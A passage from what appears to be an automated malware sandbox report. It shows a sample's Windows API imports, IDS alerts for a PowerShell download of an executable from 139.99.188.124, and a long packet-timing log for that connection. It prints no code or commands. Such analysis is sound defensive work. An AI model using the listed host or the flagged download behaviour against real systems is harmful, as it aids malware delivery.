CloseClipboard, GetWindowRect, SetUserObjectSecurity, IsClipboardFormatAvailable, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, OpenClipboard, GetWindowLongPtrW |
| GDI32.dll | EndPath, DeleteObject, GetDeviceCaps, ExtCreatePen, StrokePath, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, PolyDraw, GetTextExtentPoint32W, CreateCompatibleBitmap, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StretchBlt, SelectObject, CreateCompatibleDC, StrokeAndFillPath |
| COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW |
| ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegSetValueExW, GetSecurityDescriptorDacl, GetAclInformation, RegCreateKeyExW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW, GetUserNameW |
| SHELL32.dll | DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW |
| ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket |
| OLEAUT32.dll | VariantChangeType, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, VariantTimeToSystemTime, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, VariantInit, VariantClear, VariantCopy, SysAllocString, SafeArrayCreateVector, VarR8FromDec, SafeArrayAllocDescriptorEx, SafeArrayAllocData, SysStringLen, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, SysReAllocString, SafeArrayAccessData |

| Language of compilation system | Country where language is spoken | Map |
|---|---|---|
| English | Great Britain | |

| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-02T10:54:56.815327+0100 | 1810000 | Joe Security ANOMALY Windows PowerShell HTTP activity | 1 | 192.168.2.5 | 49704 | 139.99.188.124 | 80 | TCP |
| 2025-01-02T10:54:56.815357+0100 | 1810003 | Joe Security ANOMALY Windows PowerShell HTTP PE File Download | 2 | 139.99.188.124 | 80 | 192.168.2.5 | 49704 | TCP |

                                                          Jan 2, 2025 10:54:57.230870008 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.430741072 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.430763960 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.430773973 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.430820942 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.430830956 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.430841923 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.430851936 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.430886030 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.430907965 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.430963993 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.430974960 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.430984974 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.430994987 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.431006908 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.431046009 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.431168079 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.431180000 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.431216002 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.431261063 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.431272984 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.431282043 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.431308031 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.431497097 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.431509018 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.431518078 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.431528091 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.431536913 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.431545019 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.431549072 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.431579113 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.431716919 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.431727886 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.431739092 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.431770086 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.431783915 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.432141066 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.432177067 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.432188988 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.432216883 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.432282925 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.432326078 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.432367086 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.432378054 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.432387114 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.432396889 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.432409048 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.432440042 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.432533026 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.432543039 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.432553053 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.432585955 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.432661057 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.432709932 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.433130980 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.433141947 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.433176994 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.433182001 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.433224916 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.433234930 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.433276892 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.433341980 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.433386087 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.433414936 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.433425903 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.433435917 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.433445930 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.433463097 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.433497906 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.433585882 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.433598042 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.433635950 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.434093952 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.434112072 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.434151888 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.434159040 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.434163094 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.434202909 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.434297085 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.434309006 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.434318066 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.434326887 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.434345007 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.434372902 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.434427023 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.434482098 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.434492111 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.434501886 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.434526920 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.434554100 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.435035944 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.435054064 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.435064077 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.435106039 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.435192108 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.435211897 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.435220957 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.435246944 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.435264111 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.435354948 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.435365915 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.435375929 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.435384989 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.435422897 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.435525894 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.435537100 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.435580015 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.436009884 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.436125994 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.522912025 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.522923946 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.522939920 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.522944927 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.522959948 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.522969961 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.523053885 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.523062944 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.523066044 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.523077965 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.523102045 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.523119926 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.635926962 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.635948896 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.635957003 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.635999918 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.636010885 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.636111021 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.636115074 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.636127949 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.636143923 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.636178017 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.636197090 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.636199951 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.636276007 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.636286974 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.636323929 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.636377096 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.636387110 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.636428118 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.636457920 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.636467934 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.636477947 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.636509895 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.636526108 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.636570930 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.636593103 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.636626959 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.636684895 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.636696100 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.636704922 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.636729002 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.636826038 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.636842012 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.636851072 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.636859894 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.636868000 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.636872053 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.636884928 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.636915922 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.637067080 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.637077093 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.637087107 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.637113094 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.637147903 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.637193918 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.637223959 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.637236118 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.637269020 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.637356997 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.637367010 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.637377024 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.637387037 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.637408018 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.637423992 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.637640953 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.637651920 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.637661934 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.637671947 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.637681961 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.637691975 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.637691975 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.637702942 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.637705088 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.637713909 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.637723923 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.637731075 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.637748957 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.637975931 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.637986898 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.637998104 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.638020039 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.638041973 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.638103008 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.638113976 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.638124943 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.638149023 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.638216019 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.638227940 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.638264894 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.638361931 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.638371944 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.638380051 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.638397932 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.638407946 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.638407946 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.638420105 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.638427973 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.638459921 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.638705015 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.638716936 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.638725996 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.638736010 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.638745070 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.638755083 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.638765097 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.638767004 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.638775110 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.638780117 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.638789892 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.638796091 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.638811111 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.638824940 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.639038086 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.639112949 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.933845997 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.933856964 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.933866024 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.933876038 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.933887005 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.933897018 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.933911085 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.933986902 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.934077978 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.934088945 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.934098959 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.934132099 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.934184074 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.934195042 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.934204102 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.934214115 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.934226036 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.934237003 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.934274912 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.934411049 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.934425116 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.934432983 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.934443951 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.934453011 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.934463024 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.934468031 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.934478998 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.934484005 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.934494972 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.934504986 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.934506893 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.934547901 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.934772015 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.934782028 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.934792042 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.934802055 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.934811115 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.934820890 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.934824944 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.934832096 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.934875011 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.935092926 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.935103893 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.935112953 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.935121059 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.935131073 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.935141087 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.935141087 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.935149908 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.935159922 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.935169935 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.935172081 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.935175896 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.935182095 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.935201883 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.935229063 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.935528994 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.935542107 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.935550928 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.935565948 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.935576916 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.935580969 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.935590982 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.935595036 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.935606956 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.935616016 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.935620070 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.935621023 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.935631990 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.935642004 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.935652018 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.935652018 CET4970480192.168.2.5139.99.188.124
